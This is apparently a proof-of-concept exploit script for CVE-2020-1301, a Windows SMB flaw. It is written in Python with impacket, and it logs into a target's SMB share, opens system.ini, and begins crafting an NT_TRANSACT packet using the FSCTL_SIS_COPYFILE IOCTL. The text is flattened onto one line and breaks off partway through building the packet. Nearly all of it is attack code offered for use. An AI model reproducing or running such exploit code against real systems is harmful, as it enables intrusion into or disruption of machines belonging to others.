#!/usr/bin/python from scapy.all import * from impacket import smb import sys, getopt def main(argv): try: opts, args = getopt.getopt(argv,"ht:u:p:",["target=", "username=", "password="]) except getopt.GetoptError: print './CVE-2020-1301.py -t ' sys.exit(2) target_ip = "127.0.0.1" username = "" password = "" for opt, arg in opts: if opt == '-h': print './CVE-2020-1301.py -t -u -p ' sys.exit() elif opt in ("-t", "--target"): target_ip = arg elif opt in ("-u", "--user"): username = arg elif opt in ("-p", "--password"): password = arg ''' IOCTL Code: 0x090100 is FSCTL_SIS_COPYFILE ''' s = smb.SMB('*SMBSERVER', target_ip) s.login(username, password, '') tid = s.tree_connect_andx(r"\\*SMBSERVER\C") print "tid = %d" % tid fName = 'Windows\\system.ini' fid = s.open_andx(tid, fName, smb.SMB_O_OPEN, smb.SMB_ACCESS_READ)[0] print "fid = %d" % fid try: s2 = smb.NewSMBPacket() cmd = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT) cmd['Parameters'] = smb.SMBNTTransaction_Parameters() cmd['Data'] = smb.SMBNTTransaction_Data() IoctlCode = 0x90100 setup = smb.pack('